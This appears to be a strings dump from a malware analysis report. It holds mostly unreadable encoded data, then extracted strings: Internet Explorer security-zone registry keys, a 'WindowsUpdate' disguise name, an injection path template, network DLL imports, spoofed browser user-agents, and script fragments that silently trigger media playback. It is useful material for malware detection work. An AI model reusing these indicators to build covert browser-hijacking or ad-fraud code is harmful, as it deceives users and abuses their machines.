GLyo37d29wqznvhkfttKuwM62BVwfzzNFX RdhHu5DX4Qqz5U IZaTNSPsXQYSpZHnJtcYtl7fgkBpD9Ezl4FwN8YDZrPTSiZ94GfMNxsm2T2ahGmEi9AQi8J6Yb3JrWYjo5poeNjXvqY0b2TVygFXorynEgAah3J7tDepAP3B10vauooVjTlhHaqUFinkbgfbMdpPjleeIX9/or5vH8S/mPCCkfvu7/sdhUaAcYqaMBZgS9fmlEp8HnwyPnzp1UcK3gw1bsWDBjd4cLdODm5FXiPV8Ae8zUjBgU8KdSzVbA2GNJDnrpcChLB7nDyu2dQuF5YipF1/SOfIqtqqtoYHSN5wlqlKf27DyUkUtWs 0wofei4spsC43YMDMK FelI6vkxSrpYvFR/L4EuoZayxGGz u50U8SHnlq6f3BJ1CYaWoWPu/6ZFx2ctY9B7p5FGMyx7Wh7RudN1CPb3nRnjcdipok1y5rYJuy6fTDe94/W1n4O5gMBKI3ENQGro28P/zequsQ/2NwHygdQ jgYIM/0cjBReqXqGdonn8TSJQvTPQoG1BM5BHm4iQ0dHCGCxULBYXKCsIQ6EQ22gEweFwCIIiZ44Hb4iwmWYNrfGOg6/CmBCmW8lNPuryYHm7R72So5e0ix7AV7yCD7SKiNxPkA/01bPbd7MkZJMdZj8EZ Dha2IU0RFMEQmLi9pmk0 EiDEXNN5lLbfqScHFc/x4B8fsziFj4IxcSYnyXgsvZhXxY5WekEhLY0RrAFBMcHfQIH PqN6mudOAAIcMZoY0wgTRt1toBvUDESld18WNHj6TQEczXGrsFI/KIiuK69pf6wpDgoM0ilDTEnRWvbjJug0ZB8ASU/WsU3zh7j9USRdqvlCyUj GCpwR49iaWQUc6fMXGzIbAJHAAcCGV6Ed3ohqn/uxdZvCO25Kw Yp9dbBjoVjaB3zTz9bXdNM/JF0mzn54N0VYndNaMUroohblm4FAikvOuNXq/4HJHnlKx8JZy f4bJRxIG4poNfiSOxJst5nSlRJvBaVQk89xZwyeKsPv80JsloB5uWywvBWUd1MLqZW3/o0uPiRjnjdF6BVHvomGIBbX RFJsqnJM3FBRnRXJyx9uzlSqtxq1HgoXyjXRatjnwgQXs ID05Y5YGBBggeX vNcnvT1DOCCKtM6nkr5uXfQO00Ez3lp8qss81ISqaqvYgKhXjOpE4t0ThZ4nu5MjNhAEftZun28J5QM92Fg1sA EvS1WGYOesYnyTmz8y770nhYKU1gY8e/GZvspTsmFOJTLjPuZUOnmmvKWRobkP7JHilnL/XEOR4yzUKO4cpVlTVhFHdn4i0Qn7RACJB5Gc6WLhFPClvQEtPnjfKCC/ST8BN6AJScAh0zPU0X59YHxuT z5kKgAPXXA22AEJ6zNx0hV3ewiy RFxf9c Y6tfIMVqPaTITuFAFdbiiVfGOcyCpTN7XYerPwHfwECzrYKl2jW5NlrL/hhAblyx1hk6s9fqgAu/o4WWPSGpQXNcFC776mAU8bDbNpXofn8E6FDDr u4yEGxvo0T//sSFPe6XSFaqghapw1qfP6Ux2BEi7FAgd5nTrSUx2lwv/wfceypmnNkPyIVsk6ldWavqpqlvIBVS5/gI E 93dGOMQk8K6LCD/ql9cO287As1dvh5/DOJYxf2EAYhJsDkxDXkeot9GR4RYi4c8Lc9 U7liHzFxM 9qy9Xa 9jqWC19zpc/oCGwAmtJhIPAXIHBxZU4G3 pq ftM0xVl2FqGb1t5Zd c9lTRTKUV/5uos67xmcb3c1XfbASM76pi QLxawj/mnyqRxlDKM3pK Gx0CgaNjbbu cABFOlvJOuWliPDcC4mVja/VS3zfDuuwwhiFceS1zCk1h6FwALzKzFgZ1LCl7z 9aukYU06l4jXGe9X3ZLWPFxau4kw4t qc5WeOMwrYM5gx3pOsTjgd8VsZVfxtcSy wYWn9YShV2lca4tssiibvIyva3BaKxn 1bU ai0YWx5bseionczjkQIgrnL8PIz4vuflDIKEt OlS7hgjAft/cxJvkehsIYUa7kxzzUGIi/x8wZUL2mqkeYB45nYa2kOWooEwp9JorttoNsycTGjk12CBo8Rv/7v04thxVKjsPjIFVIwWTnFd6vFhugyYSgcOAkpvVFdQ3RUqbsPMptQeYA3eaB86c9vJ6OLbfiGs3VqkB1VHXSsrGbsvC GTtBPf0/aiPQovV06ozR2nkJyLw8hsqwBoiREYRjpsDIYIjJTeULjuCnGJKAEL1dCAJduTPcwbJMse1OQUifr/JTMGmgrDoDI7odfihQ4CC 74HVfXdBIJVCtLFroThFXRQQWYFzal7mWkI74eYWGo665IqJvQkYLqReZ9M6TZCh4pW2G7DF0ieIar8LM7nWBx3r0hULzBAqpISOtyY0qfHWoa5Kh1MH /KCEe8sUJwLW2skyab23Op6YvEIoq N9venHZwIp1FZ2CY R0FILJBiHLZtOBxk5UWug0Vcw55sEa5ZoxGdXraYTrrBQnM3FqHndNyUHM6PO7A4RwC10a9izcZL0MHda9wArqA82Om3PwbfNW bWbuI C9bwYusUrdTYWpd lJ1IykioG4M4thh9E7f5JA56i6vs8ObsGzUBurMpdy9p8E7fq6MiLsiLa3/ bMXprvN7j0EAr9SerDSB9a5miF4rjQYfPTn3lP0aDYmZAYhDTphNKp01B/ohxl4tWblFTYI0GFR8oFdPUlyt8PAVr/GyicqZ1EVZOr/h65h2pRnhdUGsZ4aHm08P8mY UlaCHQovzC3pBYskCa88lH8jHCrFxJFyrXY91XIIiLqKqCW3Y7VPudBoulL nENDvpGqsx57qMZvwSVrnCnXwTmaJDLcRplzCOe1YUUp7db4HF7gMrp1KbLcHmo08Msvr7QvQ42VdZphTZEdtXgbmoz4yqZRhIB6MBS7J6/NgspVWqnU j0egcHeir5hHhOQz0KqKoyk9whA5l9IHu3enmEAp9uqhcNoVU/JymPa7vB auqMC2Tkq5LJqSpBnuV81pj9sHoEu46Sh/8d LctuPOLP/NRxerYnZmLNubaAW7pfmylP8RTuz2RkmlPgpI4y3lu09/4DUpdH4K1zsCLA3MKmSrr5QdqbgKb3utFFdA43ePIfpubeIhDHl 7MyZF6fj36fFUMwBSytOxIAhuIfB5BatsycIMnWyaIODri9eWy9f0gRDXyXLhZu2a8oy4ngDy5RccgzdSA3r5gPVq1DcARbFBf7q0nZ8QLExq7L5SWkmk1kt7RQsw0o3ILxDVA5gjGH41XRkT0J43IlQAqeKkopfWtTS3itROAEPXMqiBob7qsJhL2d7/JE/XfLi3WSIZDQsXTVkraSUB xSwYXQpm/AoEYkjg w6po yADwHGv4XrTvUW663W Lk69OiSiEr3WjBPvMEsTculhoSsqd5tGybb6cPc5L8HBkCFYm42taYz5lH/ivaFlarLR2jJNWQGzsOD8gOEbt02DBeFxgd6K/G5/SAk35IKSTnv9GMWiZaVw5UKKF8uPfjEM3C44rW0wUWuXOoB5e434 XsaP2f6SaZB3O9wM/onOlT7S8XLm7wA1y6TOri HP67EDVdiz88xqvW8vZA5ZRUzAr2g1rNIaNr58NK3b2Zb061jrq9RleL9SfbUhD1j2B3qM1U8UWUMyV2WyFk U6dY Vk3bKm9mp3eN7x93uFzNdNWoQRioQDIPncqo6X/vk4Sn84sjTkuL4unL2P2Syb6W3AqVMuZP8MZJpKwKZVK2BOVFEe6AthPBY5E6ppjZXQZAX QQlduP7P8OnBe bzro3D5O6ik6sE0BuDHsigH/XFEo5SD/UKpipt1zQ11EPjOhmv6dC1vSzbLNnEs5HqvkoR8VbycEtwuQnbrKmNwU0Sp4AeWVgbBdnrE5xzDmwwOrb8RLf4uRdDA zvyp3YIUEdbFClyI23sYMzZeerviJKmli5sKAggtA156MBwy9X/My1znXqE4CN2WHGw98w3J29lYdy7qdrdr7aGfFNmLSRsYrLyI02yQztq851Q4eXQrm5xFP8c2/QaWoPF7Z6ob qAhvzrQwZlYBD0h31As6eIoGOjyFxafA0VSbup8aGEVwQObH2KIMEWFWzgS3JdHf7qeddf0PdbwhZSYGJNhAfgZ289xjomb9SFLC6Vk4bqWrtBvwDi5Czg7IZWpeJCSmtArzWeI7d TJDIxqe/fbzTPcpwmrvaEonoVpehdPpV1MQskviMtIE3Z5SW5JgLrgs3E2uVBhDgS8HTlM0QUql1obCFr5z2BdK22XoIHAWC cmO0tstqUbrq/8KwSEcRPzEH12ecc fNtVTp/vuJlHs3jUQj13JKP774TjCiTaRNW1Aaz4vw1O1JKUW5J4CJ80TjsBKRIPI6/eHJEo6j1Vjkvifhco5D2pO3u6brdl3IXn2 y/un7ls5fOeCOxd20OhKjLfonN6gpamBjg5aTMF3HxJCKkV6f2P/DY78GJky1PMRq9eH0K3GLxNAXKinpfumKxCOw6YXADqtFJP5zaZEScGB0JpdHQoTZN4rIXdVfPFMzY9WTdVGLZFR8rJZsTfrXjjgTAwX808MmwMADEd ImzwqbwsVElFZdYpIWhPNTJ7dQlAtH3TxogwAoqXyhgN89aKS22cu2INrv88EzRacDX6JsuC/OwbB036BxOKMOWbTszedY5Z01rxrpinmcY1hhQ3dR/Tm34IAqK9es49Eq4mWsYLS EvDfwMZG6jVTFZ56aUqdpnTT65dtypBA0j3/FxoK8CsWoTEfpiWdzXsTxjusrVSL5Xcmm49fmZekYH1T/fYQvwb6wHs51d9t0GaRO6JFLMOY7BNAAXiQ3uFj0nXC0uPaAD0CTAgwZU8BBM/PE9ZsZHdjbVPlbKZkd LMkQIdF60X9 PA2SkRhSMVguUVWfqP0DoklC7dc9g0bUsUVK0ngMjMbjsGsV4XuwprrJ xZgn93uPe0k5TWrizXLSvWkpe779CdGRa BH/NoP6jPKdgn9SNCBvTuLyaLI6E7sNu WjWOQzXP/n31Y9Yx7wg5DWeOKPHQhz0v7Tv4OFuiCYr5cLLTyQHOcttcQxtlHx6i3WfZ1IhhMmM7sSwQrBSg/immXJmf73xxfdzZZaxbqitMIO3EUjfOwLSb/92m3Ma6zGguU/ZhLSuRF7H3IRgHGj2zUal1eyopZvpqoDLXACLiBjK G5DTHc7qze8Aq9wbxOp8z8IMU5/TyDuayY9LfsSKp6V9xFRCfXLKFwz23W 1q8OGAMYX74Be Fu3dwEW2tT9mGHflTbsjXRteUDBsAViTteWkGnZ7qTLlqfK7u8W0UNdvQSBQ8V32tKUYUa li8XWA7E qhyHptmW/ryVqALJtfA5mRG/6NnqfqmOFS8ACGKtbbgBBVSXbJnU02mBNLs9APkC iNSbH/45SkXEWyTuj/v0WfhBEqZ4csZsedP4sTCrp6SqQ5LGavvbL/Jroeiq4/wkk9jDjb24vDL1hvP8RbKkxGft2If8ByHeacQrDP6ing2aeh4QJWyTyv7Izwl8rx0rdN8Ctg4tPnViU hCRqlK AnenBy0oj9iuJMQGLjfTeMmfTYhX VtocONi90cFUoFoXY6RhpvOVQlUqLagtkcYN4HfQeRJJnPZ4npyD7TjUOYK8HMm1lCl4tuWqIQNmADXKjY1sNHvxynAX0toNiSaTz5ZlvvO87TaqumHod4dUj1Vioa5L78vZeDZ1eVzDxmzqvuP8daJqRWFj9CfAgB00QyaO68z1RPs69eBTWYenvQhhWLnECcsUo9Oo/7yVD54qXddSedf4FF0Y1phD5wri6KjGEsaGJfwVUKC/dmEK5nPlA7F7KlxItFk 5rTseZVu6AKTgI7ALW2aIMIm65ze4R9tX7QmZIP6kUatdcPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADc

C8awVgMXV9vSi1BFF84c4B2LLj3ZyoV2Qb4Cp1fjeXzNbuE C/NOeyDxEiWq KAKYpcDw0MN03HLvP X68Twy06sJD1a75Ix8ZYYtMfBzG6bOl2S055vgBpGXePBPy10 EE5/nPwqFfmma5P SWmtr/unuKTXz3CYHDqU7l04vA3nXuBxiR/H3300uMmNOd8rckhl/27CFO7Z/7wb3 ckg3vq5FyOm638bm3E6xPWpHzNe ekY CNkDYMxZSenzqz d2OWvy610ctvP/4zfbwjyPnV7OyUjNNsd884gq1UeBxNtTA4Gq01CNaR2WFJNroUacP4rF7rnvztggNjxANsE26EK8zhbRSm2xw9YVXBamCQU0CoOu9kYQsbABXh16aiRnvvPrGd/Pk64B5Ijsf66Yg/ 24sKlRuKdfiRj8Cu5TbL8HFAcfx9uSaayN0nIU8Cb/F8g1mzX4pCpnBmj7AL/uqsEuLAtuxgH0DgSqz3UN mIFAT8fXXaIXDUBIy12Pa7W2cJQTgGvC0KO4Z8D5Q1XNS2/uZum9rLEICYOgm/uSfXNrWcrXL67xe3ES/R1im56DGnpzcD79NLxL08H7gXnk4IIGAU4hPLZmmLkiZdSK3ea9J8NLKwIZIGQ5GtCYIhNo8mswzlWe9HCuJvkElVO7Yn4firX/XB0roU 4 7lg5mVGHbYn Cde1V2MF1NG01/0LdhDueGifdOrz/upnRDyYtEA7qWAYQKzTkLRXXoexX4yz9cq6oKaJYxYFneIahOS43IkirG30vhiq29S TDiokA90t1//u9iUC8MeJ54PQ/QHGxU 33lAgQWcxZqV92qxprubwz6CE0aH0wSHG7pZSu5oMJB YAFZ5fCSnrM7jDUVG4j72D5jw2r1Xf 8AZ qDVdkW1jtIBOVU5UcEya3fLYAHNsvrmxxMYy1TyAaEJ7z2h6 OXmyl9bjMQZHu31V39G/DrYWAQL VxL6btazkFp9n2jWGravH9bmxx UVMMlwNoqyrpKRMMKw2/yTs7qd/GXOqKBUiGBQVfVNZ/rSJXBEnmWwT21RpMP/hrF AYwqKRJfbMup1h6Ousk0MTCddz9p1n9 peAAf8565VJFRi7kksOaVEt15YJ2LF4TmU/wcq6P6WAIC2PspbhW7Wu V5 gDjujIbqzreSGBdA/iaZwk2OtJxu2/e3rw6aCHXBywbAOazkvdgWPDXufcHybYGGWGHBkrnfWNzIAkaPCaDVouiMguIXr8KDSG1 4xlQ5x6v8mWkekwNcSstXZH4D1TGyPch2pINQtU56LFJQg3m27IuVDKfzakcOrsbqq6Qixgcq1IIdHX533uSfnOA58SEofj6eaJuetab15SRYn9HJW4Hobv2VAwdyoTxwnshUx0yNUgiQEzvAZzn xhTgaVCN/WAd3/ahucI/ioTaSIF5uJXMCyzokd8k/2YYDVRDIdNzEbUxwLg4H GLyo37d29wqznvhkfttKuwM62BVwfzzNFX RdhHu5DX4Qqz5U IZaTNSPsXQYSpZHnJtcYtl7fgkBpD9Ezl4FwN8YDZrPTSiZ94GfMNxsm2T2ahGmEi9AQi8J6Yb3JrWYjo5poeNjXvqY0b2TVygFXorynEgAah3J7tDepAP3B10vauooVjTlhHaqUFinkbgfbMdpPjleeIX9/or5vH8S/mPCCkfvu7/sdhUaAcYqaMBZgS9fmlEp8HnwyPnzp1UcK3gw1bsWDBjd4cLdODm5FXiPV8Ae8zUjBgU8KdSzVbA2GNJDnrpcChLB7nDyu2dQuF5YipF1/SOfIqtqqtoYHSN5wlqlKf27DyUkUtWs 0wofei4spsC43YMDMK FelI6vkxSrpYvFR/L4EuoZayxGGz u50U8SHnlq6f3BJ1CYaWoWPu/6ZFx2ctY9B7p5FGMyx7Wh7RudN1CPb3nRnjcdipok1y5rYJuy6fTDe94/W1n4O5gMBKI3ENQGro28P/zequsQ/2NwHygdQ jgYIM/0cjBReqXqGdonn8TSJQvTPQoG1BM5BHm4iQ0dHCGCxULBYXKCsIQ6EQ22gEweFwCIIiZ44Hb4iwmWYNrfGOg6/CmBCmW8lNPuryYHm7R72So5e0ix7AV7yCD7SKiNxPkA/01bPbd7MkZJMdZj8EZ Dha2IU0RFMEQmLi9pmk0 EiDEXNN5lLbfqScHFc/x4B8fsziFj4IxcSYnyXgsvZhXxY5WekEhLY0RrAFBMcHfQIH PqN6mudOAAIcMZoY0wgTRt1toBvUDESld18WNHj6TQEczXGrsFI/KIiuK69pf6wpDgoM0ilDTEnRWvbjJug0ZB8ASU/WsU3zh7j9USRdqvlCyUj GCpwR49iaWQUc6fMXGzIbAJHAAcCGV6Ed3ohqn/uxdZvCO25Kw Yp9dbBjoVjaB3zTz9bXdNM/JF0mzn54N0VYndNaMUroohblm4FAikvOuNXq/4HJHnlKx8JZy f4bJRxIG4poNfiSOxJst5nSlRJvBaVQk89xZwyeKsPv80JsloB5uWywvBWUd1MLqZW3/o0uPiRjnjdF6BVHvomGIBbX RFJsqnJM3FBRnRXJyx9uzlSqtxq1HgoXyjXRatjnwgQXs ID05Y5YGBBggeX vNcnvT1DOCCKtM6nkr5uXfQO00Ez3lp8qss81ISqaqvYgKhXjOpE4t0ThZ4nu5MjNhAEftZun28J5QM92Fg1sA EvS1WGYOesYnyTmz8y770nhYKU1gY8e/GZvspTsmFOJTLjPuZUOnmmvKWRobkP7JHilnL/XEOR4yzUKO4cpVlTVhFHdn4i0Qn7RACJB5Gc6WLhFPClvQEtPnjfKCC/ST8BN6AJScAh0zPU0X59YHxuT z5kKgAPXXA22AEJ6zNx0hV3ewiy RFxf9c Y6tfIMVqPaTITuFAFdbiiVfGOcyCpTN7XYerPwHfwECzrYKl2jW5NlrL/hhAblyx1hk6s9fqgAu/o4WWPSGpQXNcFC776mAU8bDbNpXofn8E6FDDr u4yEGxvo0T//sSFPe6XSFaqghapw1qfP6Ux2BEi7FAgd5nTrSUx2lwv/wfceypmnNkPyIVsk6ldWavqpqlvIBVS5/gI E 93dGOMQk8K6LCD/ql9cO287As1dvh5/DOJYxf2EAYhJsDkxDXkeot9GR4RYi4c8Lc9 U7liHzFxM 9qy9Xa 9jqWC19zpc/oCGwAmtJhIPAXIHBxZU4G3 pq ftM0xVl2FqGb1t5Zd c9lTRTKUV/5uos67xmcb3c1XfbASM76pi QLxawj/mnyqRxlDKM3pK Gx0CgaNjbbu cABFOlvJOuWliPDcC4mVja/VS3zfDuuwwhiFceS1zCk1h6FwALzKzFgZ1LCl7z 9aukYU06l4jXGe9X3ZLWPFxau4kw4t qc5WeOMwrYM5gx3pOsTjgd8VsZVfxtcSy wYWn9YShV2lca4tssiibvIyva3BaKxn 1bU ai0YWx5bseionczjkQIgrnL8PIz4vuflDIKEt OlS7hgjAft/cxJvkehsIYUa7kxzzUGIi/x8wZUL2mqkeYB45nYa2kOWooEwp9JorttoNsycTGjk12CBo8Rv/7v04thxVKjsPjIFVIwWTnFd6vFhugyYSgcOAkpvVFdQ3RUqbsPMptQeYA3eaB86c9vJ6OLbfiGs3VqkB1VHXSsrGbsvC GTtBPf0/aiPQovV06ozR2nkJyLw8hsqwBoiREYRjpsDIYIjJTeULjuCnGJKAEL1dCAJduTPcwbJMse1OQUifr/JTMGmgrDoDI7odfihQ4CC 74HVfXdBIJVCtLFroThFXRQQWYFzal7mWkI74eYWGo665IqJvQkYLqReZ9M6TZCh4pW2G7DF0ieIar8LM7nWBx3r0hULzBAqpISOtyY0qfHWoa5Kh1MH /KCEe8sUJwLW2skyab23Op6YvEIoq N9venHZwIp1FZ2CY R0FILJBiHLZtOBxk5UWug0Vcw55sEa5ZoxGdXraYTrrBQnM3FqHndNyUHM6PO7A4RwC10a9izcZL0MHda9wArqA82Om3PwbfNW bWbuI C9bwYusUrdTYWpd lJ1IykioG4M4thh9E7f5JA56i6vs8ObsGzUBurMpdy9p8E7fq6MiLsiLa3/ bMXprvN7j0EAr9SerDSB9a5miF4rjQYfPTn3lP0aDYmZAYhDTphNKp01B/ohxl4tWblFTYI0GFR8oFdPUlyt8PAVr/GyicqZ1EVZOr/h65h2pRnhdUGsZ4aHm08P8mY UlaCHQovzC3pBYskCa88lH8jHCrFxJFyrXY91XIIiLqKqCW3Y7VPudBoulL nENDvpGqsx57qMZvwSVrnCnXwTmaJDLcRplzCOe1YUUp7db4HF7gMrp1KbLcHmo08Msvr7QvQ42VdZphTZEdtXgbmoz4yqZRhIB6MBS7J6/NgspVWqnU j0egcHeir5hHhOQz0KqKoyk9whA5l9IHu3enmEAp9uqhcNoVU/JymPa7vB auqMC2Tkq5LJqSpBnuV81pj9sHoEu46Sh/8d LctuPOLP/NRxerYnZmLNubaAW7pfmylP8RTuz2RkmlPgpI4y3lu09/4DUpdH4K1zsCLA3MKmSrr5QdqbgKb3utFFdA43ePIfpubeIhDHl 7MyZF6fj36fFUMwBSytOxIAhuIfB5BatsycIMnWyaIODri9eWy9f0gRDXyXLhZu2a8oy4ngDy5RccgzdSA3r5gPVq1DcARbFBf7q0nZ8QLExq7L5SWkmk1kt7RQsw0o3ILxDVA5gjGH41XRkT0J43IlQAqeKkopfWtTS3itROAEPXMqiBob7qsJhL2d7/JE/XfLi3WSIZDQsXTVkraSUB xSwYXQpm/AoEYkjg w6po yADwHGv4XrTvUW663W Lk69OiSiEr3WjBPvMEsTculhoSsqd5tGybb6cPc5L8HBkCFYm42taYz5lH/ivaFlarLR2jJNWQGzsOD8gOEbt02DBeFxgd6K/G5/SAk35IKSTnv9GMWiZaVw5UKKF8uPfjEM3C44rW0wUWuXOoB5e434 XsaP2f6SaZB3O9wM/onOlT7S8XLm7wA1y6TOri HP67EDVdiz88xqvW8vZA5ZRUzAr2g1rNIaNr58NK3b2Zb061jrq9RleL9SfbUhD1j2B3qM1U8UWUMyV2WyFk U6dY Vk3bKm9mp3eN7x93uFzNdNWoQRioQDIPncqo6X/vk4Sn84sjTkuL4unL2P2Syb6W3AqVMuZP8MZJpKwKZVK2BOVFEe6AthPBY5E6ppjZXQZAX QQlduP7P8OnBe bzro3D5O6ik6sE0BuDHsigH/XFEo5SD/UKpipt1zQ11EPjOhmv6dC1vSzbLNnEs5HqvkoR8VbycEtwuQnbrKmNwU0Sp4AeWVgbBdnrE5xzDmwwOrb8RLf4uRdDA zvyp3YIUEdbFClyI23sYMzZeerviJKmli5sKAggtA156MBwy9X/My1znXqE4CN2WHGw98w3J29lYdy7qdrdr7aGfFNmLSRsYrLyI02yQztq851Q4eXQrm5xFP8c2/QaWoPF7Z6ob qAhvzrQwZlYBD0h31As6eIoGOjyFxafA0VSbup8aGEVwQObH2KIMEWFWzgS3JdHf7qeddf0PdbwhZSYGJNhAfgZ289xjomb9SFLC6Vk4bqWrtBvwDi5Czg7IZWpeJCSmtArzWeI7d TJDIxqe/fbzTPcpwmrvaEonoVpehdPpV1MQskviMtIE3Z5SW5JgLrgs3E2uVBhDgS8HTlM0QUql1obCFr5z2BdK22XoIHAWC cmO0tstqUbrq/8KwSEcRPzEH12ecc fNtVTp/vuJlHs3jUQj13JKP774TjCiTaRNW1Aaz4vw1O1JKUW5J4CJ80TjsBKRIPI6/eHJEo6j1Vjkvifhco5D2pO3u6brdl3IXn2 y/un7ls5fOeCOxd20OhKjLfonN6gpamBjg5aTMF3HxJCKkV6f2P/DY78GJky1PMRq9eH0K3GLxNAXKinpfumKxCOw6YXADqtFJP5zaZEScGB0JpdHQoTZN4rIXdVfPFMzY9WTdVGLZFR8rJZsTfrXjjgTAwX808MmwMADEd ImzwqbwsVElFZdYpIWhPNTJ7dQlAtH3TxogwAoqXyhgN89aKS22cu2INrv88EzRacDX6JsuC/OwbB036BxOKMOWbTszedY5Z01rxrpinmcY1hhQ3dR/Tm34IAqK9es49Eq4mWsYLS EvDfwMZG6jVTFZ56aUqdpnTT65dtypBA0j3/FxoK8CsWoTEfpiWdzXsTxjusrVSL5Xcmm49fmZekYH1T/fYQvwb6wHs51d9t0GaRO6JFLMOY7BNAAXiQ3uFj0nXC0uPaAD0CTAgwZU8BBM/PE9ZsZHdjbVPlbKZkd LMkQIdF60X9 PA2SkRhSMVguUVWfqP0DoklC7dc9g0bUsUVK0ngMjMbjsGsV4XuwprrJ xZgn93uPe0k5TWrizXLSvWkpe779CdGRa BH/NoP6jPKdgn9SNCBvTuLyaLI6E7sNu WjWOQzXP/n31Y9Yx7wg5DWeOKPHQhz0v7Tv4OFuiCYr5cLLTyQHOcttcQxtlHx6i3WfZ1IhhMmM7sSwQrBSg/immXJmf73xxfdzZZaxbqitMIO3EUjfOwLSb/92m3Ma6zGguU/ZhLSuRF7H3IRgHGj2zUal1eyopZvpqoDLXACLiBjK G5DTHc7qze8Aq9wbxOp8z8IMU5/TyDuayY9LfsSKp6V9xFRCfXLKFwz23W 1q8OGAMYX74Be Fu3dwEW2tT9mGHflTbsjXRteUDBsAViTteWkGnZ7qTLlqfK7u8W0UNdvQSBQ8V32tKUYUa li8XWA7E qhyHptmW/ryVqALJtfA5mRG/6NnqfqmOFS8ACGKtbbgBBVSXbJnU02mBNLs9APkC iNSbH/45SkXEWyTuj/v0WfhBEqZ4csZsedP4sTCrp6SqQ5LGavvbL/Jroeiq4/wkk9jDjb24vDL1hvP8RbKkxGft2If8ByHeacQrDP6ing2aeh4QJWyTyv7Izwl8rx0rdN8Ctg4tPnViU hCRqlK AnenBy0oj9iuJMQGLjfTeMmfTYhX VtocONi90cFUoFoXY6RhpvOVQlUqLagtkcYN4HfQeRJJnPZ4npyD7TjUOYK8HMm1lCl4tuWqIQNmADXKjY1sNHvxynAX0toNiSaTz5ZlvvO87TaqumHod4dUj1Vioa5L78vZeDZ1eVzDxmzqvuP8daJqRWFj9CfAgB00QyaO68z1RPs69eBTWYenvQhhWLnECcsUo9Oo/7yVD54qXddSedf4FF0Y1phD5wri6KjGEsaGJfwVUKC/dmEK5nPlA7F7KlxItFk 5rTseZVu6AKTgI7ALW2aIMIm65ze4R9tX7QmZIP6kUatdcPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADc

WindowsUpdate

WindowsUpdate

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

66006666

66006666

c:\%original file name%.exe path>path inj_ffile>inj_ffile

c:\%original file name%.exe path>path inj_ffile>inj_ffile

regsvr32.exe_1296:

.idata

.idata

.reloc

.reloc

P.rsrc

P.rsrc

Portions Copyright (c) 1983,99 Borland

Portions Copyright (c) 1983,99 Borland

kernel32.dll

kernel32.dll

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

USER32.DLL

USER32.DLL

wininet.dll

wininet.dll

user32.dll

user32.dll

ntdll.dll

ntdll.dll

Kernel32.dll

Kernel32.dll

URLMON.DLL

URLMON.DLL

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

PSAPI.dll

PSAPI.dll

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {jwplayer().play()} catch(e){}

try {jwplayer().play()} catch(e){}

IWebBrowser

IWebBrowser

IWebBrowserApp

IWebBrowserApp

IWebBrowser2$

IWebBrowser2$

.length;

.length;

=String.fromCharCode(parseInt(

=String.fromCharCode(parseInt(

.substr(

.substr(

,2),16));

,2),16));

